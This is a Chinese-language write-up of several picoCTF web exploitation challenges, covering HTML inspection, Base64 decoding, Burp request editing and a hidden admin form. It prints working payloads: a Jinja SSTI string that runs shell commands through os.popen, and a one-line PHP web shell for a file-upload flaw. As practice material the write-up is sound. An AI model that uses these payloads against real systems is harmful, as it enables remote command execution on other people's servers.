# picoCTF #web exploitation ## Inspect HTML 右鍵按下檢查元件,對,就是這麼簡單  ## WebDecode 到About頁面後,打開inspector,會發現一串編碼過的字,將他丟進Base64 Decoder即可解出   ## Unminify  ## Bookmarklet 進到頁面後,可以發現他給了一個JS的code,這時候就可以丟到console裡執行  ## IntroToBurp 這題我們要修改request,hint2說了他可能無法handle錯誤格式的請求,因此試著將otp參數直接刪除  ## Local Authority 在request中看到這兩句,可以知道有一個頁面是admin.php,用post進去的話,要用到hash值為2196812e91c29df34f5e217cfd639881才能通過驗,接下來就用curl來做 ``` <form hidden action="admin.php" method="post" id="hiddenAdminForm"> document.getElementById('adminFormHash').value = "2196812e91c29df34f5e217cfd639881"; ```  ## SSTI1 先嘗試是否有SSTI漏洞   確定有後即可開始攻擊,輸入 ``` {{request.application.__globals__.__builtins__.__import__('os').popen('ls').read()}} ``` 發現flag檔案  接下來將他cat出來 ``` {{request.application.__globals__.__builtins__.__import__('os').popen('cat flag').read()}} ```  ## n0s4n1ty 1 這題主要是上傳漏洞,攻擊者可以上傳一句話木馬的php檔案 ``` <?php system($_GET['cmd']); ?> ``` 上傳後找到位置,再透過網址列執行指令即可操作受害電腦 先找到flag的位置,題目說再/root資料夾裡,便使用```ls ..```找尋資料夾位置,再把flag```cat```出來    ## Cookie Monster Secret Recipe 先找出cookie  ㄟˊ好像有點眼熟?! 
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up